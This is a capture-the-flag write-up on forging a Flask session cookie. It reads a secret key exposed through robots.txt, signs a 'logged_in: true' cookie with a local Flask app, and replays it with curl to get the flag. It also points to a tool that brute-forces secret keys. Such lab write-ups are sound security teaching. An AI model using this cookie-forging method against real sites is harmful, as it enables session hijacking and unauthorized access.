# Logged Out

## description
```
We're two-thirds of the way through this set. You've made it through `Logged In` and `Logged Out` but can you solve this natural extension of the two?

[Link](http://23.253.174.85)

CTF2019-26
```

## hint
```
crack the flask session cookie
```

## author
Tim Farley

## write-up

At this point we've seen a challenge where the cookie was stored in plain text, and we've base64 decoded a flask session cookie. Using what we've learned so far, we can see the same session cookie here:

```
$ curl -v http://23.253.174.85
* Rebuilt URL to: http://23.253.174.85/
*   Trying 23.253.174.85...
* TCP_NODELAY set
* Connected to 23.253.174.85 (23.253.174.85) port 80 (#0)
> GET / HTTP/1.1
> Host: 23.253.174.85
> User-Agent: curl/7.54.0
> Accept: */*
> 
< HTTP/1.1 403 FORBIDDEN
< Server: gunicorn/19.9.0
< Date: Sat, 06 Apr 2019 17:46:16 GMT
< Content-Type: text/html; charset=utf-8
< Vary: Cookie
< Set-Cookie: session=eyJsb2dnZWRfaW4iOmZhbHNlfQ.XKjl6A.Rw4IdWYWs27ceoEiBKROfmXr0_g; HttpOnly; Path=/
< Content-Length: 22
< Age: 0
< Via: 1.1 ord1fwsg02-wcg.security.rackspace.net
< 
* Connection #0 to host 23.253.174.85 left intact
```

Decoding the cookie payload, as we've done in a previous challenge:

```
$ echo eyJsb2dnZWRfaW4iOmZhbHNlfQ=== | base64 -d
{"logged_in":false}
```

base64 encoding works in 4-character blocks, and `=` is used to pad the end of a string, thus there can be up to three equal signs at the end of a string. It's generally safe to go ahead and pad all base64 strings with three of them.

We can see that this session contains a key/value pair of `logged_in:false`. Would we be able to edit this? Well, we know flask session cookies are in the format data.timestamp.signature. The signature is the a sha1 hash based on the combination of your session data, current timestamp and the server’s secret key.

What we're missing right now is the secret key. It may be possible to brute force it, but if we've done our due diligence we've discovered this server contains an interesting `/robots.txt`:

```
User-agent: *
Disallow: /web/sekret.txt
```

and `web/sekret.txt` shows us that a very naughty web developer has not secured his secret key: `'supersekret'`

We have all the information we need to build a new cookie, but how to go about it? Well, we could dig into flask and find out exactly how the signatures are signed and write our own code to do it. But a far simpler solution would be to setup our own flask server using this secret key and have it generate a cookie for us!

Let's create a very simple flask application called `cookie.py`:

```
from flask import Flask, session

app = Flask(__name__)
app.config['SECRET_KEY'] = 'supersekret'


@app.route('/')
def index():
    # Create the session cookie ethat we want to use!
    session['logged_in'] = True
    return 'huzzah!'

if __name__ == '__main__':
    app.run()
```

It doesn't get much simpler than that. We use the sekretkey that we found and create a session cookie that matches the cookie generated by our server. Let's get our cookie!

```
$ FLASK_APP=cookie.py flask run
```

This will launch flask on  `localhost:5000` 

Curl the local server to find our newly set cookie!

```
$ curl -v http://localhost:5000
* Rebuilt URL to: http://localhost:5000/
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 5000 (#0)
> GET / HTTP/1.1
> Host: localhost:5000
> User-Agent: curl/7.54.0
> Accept: */*
> 
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-Type: text/html; charset=utf-8
< Content-Length: 7
< Vary: Cookie
< Set-Cookie: session=eyJsb2dnZWRfaW4iOnRydWV9.XKjsBA.knAR40O0m8-1ePgYX-I-y_gGTzo; HttpOnly; Path=/
< Server: Werkzeug/0.15.2 Python/3.6.5
< Date: Sat, 06 Apr 2019 18:12:20 GMT
< 
* Closing connection 0
```

We've used flask to recreate the cookie using the same secret key! Let's pass our fudged cookie (I just coined that term) to the challenge server and see what happens:

```
$ curl --cookie 'session=eyJsb2dnZWRfaW4iOnRydWV9.XKjsBA.knAR40O0m8-1ePgYX-I-y_gGTzo' http://23.253.174.85/
<h1>rax.io{h1jacked_s3ssi0n}ctf</h1>
```

There is also a nice utility called `flask-unsign` available in PyPi or directly from github, which we can use to encode cookies for us. Flask-unsign can even attempt to brute force generic secret keys from a wordlist. The author of the utility has written a fantastic article on how he managed to crack flask session cookies by generating a wordlist from secret-keys escavated from public git repositories. Check the link below for additional reading.

## notes

This concludes our 3-part series on hijacking flask cookies. I hope you enjoyed it!

### steps to reproduce

An ansible playbook is included for provisioning a server.

### taking it further

This stuff can go on forever.

### links

* https://blog.paradoxis.nl/defeating-flasks-session-management-65706ba9d3ce
* https://github.com/Paradoxis/Flask-Unsign
